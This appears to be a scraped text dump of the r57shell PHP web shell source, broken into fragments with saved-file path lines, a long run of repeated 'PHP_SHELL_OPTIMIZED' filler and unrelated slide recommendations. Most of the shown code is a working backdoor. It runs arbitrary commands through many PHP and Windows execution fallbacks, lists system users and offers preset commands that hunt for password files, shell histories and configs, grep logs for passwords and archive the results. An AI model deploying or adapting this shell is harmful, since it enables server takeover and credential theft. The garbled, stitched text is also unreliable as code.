.htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".htpasswd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".bash_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".mysql_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate backup files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate backup >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate dump files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate dump >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate priv files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate priv >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '----------------------------------tar'=>'', 'tar -czvf all.tgz -T '.$tempdir.'grep.txt'=>'tar -czvf all.tgz -T '.$tempdir.'grep.txt', '----------------------------------1'=>'', 'locate auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access_log >> '.$tempdir.'grep.txt;cat file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'.$tempdir.'grep.txt', 'locate error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate ".log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '----------------------------------2'=>'', 'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', '----------------------------------find'=>'', 'find suid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find suid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find sgid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find sgid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'find all writable files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories and files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories and files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .htpasswd >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .bash_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .mysql_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .fetchmailrc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .fetchmailrc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "config*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'find config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *.pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *.sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *backup* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*backup*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *dump* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*dump*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '-----------------------------------'=>'', 'find /var/ auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ "*_log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ "*.log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '----------------------------------------------------------------------------------------------------'=>'ls -la' ); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; $table_up2 = " ::</div></b></font></td></tr><tr><td>"; $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; $table_end1 = "</td></tr>"; $arrow = " <font face=Webdings color=gray>4</font>"; $lb = "<font color=black>[</font>"; $rb = "<font color=black>]</font>"; $font = "<font face=Verdana size=-2>"; $ts = "<table class=table1 width=100% align=center>"; $te = "</table>"; $fs = "<form name=form method=POST>"; $fe = "</form>"; if(isset($_GET['users'])) { if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } else { echo '<center>'; foreach($users as $user) { echo $user."<br>"; } echo '</center>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); } if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];} $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; if(empty($dir)) { $os = getenv('OS'); if(empty($os)){ $os = @php_uname(); } if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^win",$os)) { $unix = 0; } else { $unix = 1; } } } if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") { echo $head; if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0) file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
{ $r .= "<TABLE width=100%>"; foreach($res as $file=>$v) { $r .= "<TR>"; $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); $r .= (!$unix)? str_replace("/","",$file) : $file; $r .= "</b></font></ TD>"; $r .= "</TR>"; foreach($v as $a=>$b) { $r .= "<TR>"; $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; $r .= "</TR>n"; } } $r .= "</TABLE>"; echo $r; } else { echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
} /*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/ if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;} $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } function ws($i) { return @str_repeat("&nbsp;",$i); } function ex($cfe) {global $unix,$tempdir; $res = ''; if (!empty($cfe)) { if(@function_exists('exec')) { @exec($cfe,$res); $res = join("n",$res); } elseif(@function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(@function_exists('system')) file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
{ @ob_start(); @system('$cfe'); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r"))) { $res = ""; if(@function_exists('fread') && @function_exists('feof')){ while(!@feof($f)) { $res .= @fread($f,1024); } }else if(@function_exists('fgets') && @function_exists('feof')){ while(!@feof($f)) { $res .= @fgets($f,1024); } } @pclose($f); } elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes))) { $res = ""; if(@function_exists('fread') && @function_exists('feof')){ file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);} }else if(@function_exists('fgets') && @function_exists('feof')){ while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);} } @proc_close($f); } }else{$res = safe_ex($cfe);} return htmlspecialchars($res); } function safe_ex($cfe) {global $unix,$tempdir; $res = ''; if (!empty($cfe)) { if(extension_loaded('perl')){ @ob_start(); $safeperl=new perl(); $safeperl->eval("system('$cfe')"); $res = @ob_get_contents(); @ob_end_clean(); } elseif(!$unix && extension_loaded('ffi')) { $output=$tempdir.uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >"$output"",0);} else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >"$output"",0);} while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix && extension_loaded('win32service')) { $output=$tempdir.uniqid('NJ'); $n_ser=uniqid('NJ'); if(!@function_exists('escapeshellarg')) {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:windowssystem32cmd.exe','params'= >"/c $cfe >"$output""));} else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:windowssystem32cmd.exe','para ms'=>"/c ".@escapeshellarg($cfe)." >"$output""));} @win32_start_service($n_ser); @win32_stop_service($n_ser); @win32_delete_service($n_ser); while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix && extension_loaded("win32std")) { $output=$tempdir.uniqid('NJ'); if(!@function_exists('escapeshellarg')){@win_shell_execute('..............windowssystem32cmd.exe /c '.$cfe.' > "'.$output.'"');} file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
else{@win_shell_execute('..............windowssystem32cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix) { $output=$tempdir.uniqid('NJ'); $suntzu = new COM("WScript.Shell"); if(!@function_exists('escapeshellarg')){$suntzu->Run('c:windowssystem32cmd.exe /c '.$cfe.' > "'.$output.'"');} else{$suntzu->Run('c:windowssystem32cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} $res=moreread($output); @unlink($output); } elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork')) { $res = '[~] Blind Command Execution via [pcntl_exec]nn'; $output=$tempdir.uniqid('pcntl'); $pid = @pcntl_fork(); if ($pid == -1) { $res .= '[-] Could not children fork. Exit'; } else if ($pid) { if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';} else {$res .= '[-] Error. Command incorrect.';} } else { $cfe = array(" -e 'system("$cfe > $output")'"); if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0); die(); } $res=moreread($output); @unlink($output); } /* elseif(1) { } */ } return htmlspecialchars($res); } function get_users($filename) { $users = $rows = array(); $rows=@explode("n",moreread($filename)); if(!$rows[0]){$rows=@explode("n",readzlib($filename));} if(!$rows[0]) return 0; foreach ($rows as $string) { $user = @explode(":",trim($string)); if(substr($string,0,1)!='#') array_push($users,$user[0]); } return $users; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
} function err($n,$txt='') { echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>'; echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; if(!empty($txt)) { echo " $txt"; } echo '</b></div></font></td></tr></table>'; return null; } function perms($mode) { if (!$GLOBALS['unix']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
$world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } function in($type,$name,$size,$value,$checked=0) { $ret = "<input type=".$type." name=".$name." "; if($size != 0) { $ret .= "size=".$size." "; } $ret .= "value="".$value."""; if($checked) $ret .= " checked"; return $ret.">"; } function which($pr) { $path = ''; $path = ex("which $pr"); if(!empty($path)) { return $path; } else { return false; } } function ps($pr) {global $unix; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
$path = ''; if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");} else{$path = ex("tasklist | findstr "$pr"");} if(!empty($path)) { return $path; } else { return false; } } function locate($pr) { $path = ''; $path = ex("locate $pr"); if(!empty($path)) { return $path; } else { return false; } } function cf($fname,$text) { if(!morewrite($fname,@base64_decode($text))){err(0);}; } function sr($l,$t1,$t2) { return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; } if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
return $size; } } function DirFilesR($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(';',$types))) $files[] = $dir."/".$file; } else $files[] = $dir."/".$file; } } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
} @closedir($handle); } return $files; } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter='') { $dirs = @explode(";",$dir); $this->FilesToSearch = Array(); for($a=0;$a<count($dirs);$a++) $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED
PHP_SHELL_OPTIMIZED

Recomendados

Command Bus To Awesome Town
Command Bus To Awesome TownCommand Bus To Awesome Town
Command Bus To Awesome TownRoss Tuck
 
Things I Believe Now That I'm Old
Things I Believe Now That I'm OldThings I Believe Now That I'm Old
Things I Believe Now That I'm OldRoss Tuck
 
Models and Service Layers, Hemoglobin and Hobgoblins
Models and Service Layers, Hemoglobin and HobgoblinsModels and Service Layers, Hemoglobin and Hobgoblins
Models and Service Layers, Hemoglobin and HobgoblinsRoss Tuck
 
PHP tips and tricks
PHP tips and tricks PHP tips and tricks
PHP tips and tricks Damien Seguy
 
Gta v savegame
Gta v savegameGta v savegame
Gta v savegamehozayfa999
 
php plus mysql
php plus mysqlphp plus mysql
php plus mysqlJayson de Leon
 
Php 101: PDO
Php 101: PDOPhp 101: PDO
Php 101: PDOJeremy Kendall
 
Database Design Patterns
Database Design PatternsDatabase Design Patterns
Database Design PatternsHugo Hamon
 

Recomendados

Command Bus To Awesome Town
Command Bus To Awesome TownCommand Bus To Awesome Town
Command Bus To Awesome TownRoss Tuck
 
Things I Believe Now That I'm Old
Things I Believe Now That I'm OldThings I Believe Now That I'm Old
Things I Believe Now That I'm OldRoss Tuck
 
Models and Service Layers, Hemoglobin and Hobgoblins
